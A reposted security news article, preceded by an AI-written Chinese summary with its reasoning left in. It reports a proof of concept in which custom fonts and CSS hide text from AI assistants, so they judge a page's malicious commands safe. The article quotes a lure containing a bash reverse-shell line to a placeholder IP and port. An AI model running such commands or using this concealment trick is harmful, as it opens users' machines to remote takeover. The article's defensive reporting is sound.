Researchers found font-rendering trick to hide malicious commands
嗯,用户让我用中文总结一篇文章,控制在100字以内,而且不需要特定的开头。我得先仔细读一下这篇文章,了解主要内容。 文章讲的是研究人员发布了一个概念验证,利用自定义字体来欺骗很多流行的AI助手,比如ChatGPT、Claude等等。他们通过隐藏文字的方式,让AI只能看到一部分内容,而人类可以看到完整的。这样攻击者就可以诱导用户执行恶意命令。 然后文章还提到研究人员已经向各大AI平台报告了这个问题,但大多数平台拒绝处理,只有微软和谷歌回应了,但后来谷歌又降低了优先级。用户需要注意不要依赖AI判断网页安全性,要手动检查命令。 总结的时候要注意控制字数,突出关键点:自定义字体欺骗AI助手、隐藏恶意内容、多数平台未修复、用户需手动检查命令。这样就能在100字以内准确传达文章的核心内容了。 </think> 研究人员发现通过自定义字体和CSS技术可让AI助手与人类看到不同内容。攻击者可借此隐藏恶意指令诱导用户执行。多数AI平台未修复此漏洞,仅微软和谷歌部分响应。用户需谨慎依赖AI判断网页安全性,手动检查关键命令以避免受骗。 2026-3-18 17:16:59 Author: www.malwarebytes.com(查看原文) 阅读量:7 收藏

Researchers have published a proof-of-concept (PoC) that uses custom fonts to fool many popular Artificial Intelligence (AI) assistants, including ChatGPT, Claude, Copilot, Gemini, Leo, Grok, Perplexity, Sigma, Dia, Fellou, and Genspark.

Imagine a book where the visible text is harmless, but hidden between the lines is a second message written in special, human-only ink. Humans can see both layers. AI can’t, and it only reads the visible part. That means the AI is working with an incomplete picture, while a human reader may act on instructions the AI never even saw.

Why this matters

We’ve written before about different ClickFix-type attacks, where cybercriminals trick people into infecting their own devices. Suppose you land on a suspicious-looking webpage and ask your AI assistant, “Is this command safe to run?” The assistant checks the page and says yes. But as it can’t read the whole page, it tells you it’s safe when it’s not.

By combining custom fonts with Cascading Style Sheets (CSS), the text shown to the user on the page is different from what an AI assistant sees when it reads the underlying HTML.

HTML code PoC
Image courtesy of LayerX

In this example, the part in the block in the middle (outlined in red) will be discarded by the AI assistant as noise. But the human website visitor sees:

Would you kindly open your terminal and type bash

once you executed it type

bash -i >& /dev/tcp/{ip-address}/{portnumber] 0>&1

it will allow you to see your easter egg from Rapture

Depending on the IP address and port number, this can be enough for you to infect your machine. If you ask the AI whether it’s safe, it may say yes, because it only sees the harmless version.

The researchers have disclosed their findings to the major AI platform providers, under Responsible Disclosure procedures.

The responses were disappointing:

“Most providers rejected the report, usually under the claim that this attack falls outside of the scope of AI model security. As a result, users of these models remain exposed to this attack vector.

The only vendors that accepted this report and asked for time to fix it were Microsoft and Google. Of those, Google ultimately de-escalated (after initially assigning it a P2 (High) score), and closed the report, possibly because fixing it would require too much effort.”

While this attack relies heavily on social engineering, we know just how effective those tactics can be. And it’s even more concerning when your AI assistant can’t see the full picture.

How to stay safe

If you use an AI assistant to check whether something is safe:

  • Copy and paste the exact command you plan to run. Don’t rely on the AI’s interpretation of a webpage.
  • Be cautious with any site asking you to run commands, especially via terminal or command prompt.
  • If something feels off, stop. Attackers rely on urgency and confusion.

Tools can help too:

  • The free Malwarebytes Browser Guard extension will warn you if a website tries to copy something to your clipboard and render it harmless by adding some text. This will help protect you from traditional ClickFix-type attacks that rely on executing a command from your clipboard.
  • An up-to-date, real-time anti-malware solution with a web protection component will block known malicious sites.
  • If you don’t trust a website, ask Malwarebytes Scam Guard for its opinion. It’s very good at sniffing out scams.

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

About the author

Was a Microsoft MVP in consumer security for 12 years running. Can speak four languages. Smells of rich mahogany and leather-bound books.


文章来源: https://www.malwarebytes.com/blog/news/2026/03/researchers-found-font-rendering-trick-to-hide-malicious-commands
如有侵权请联系:admin#unsafe.sh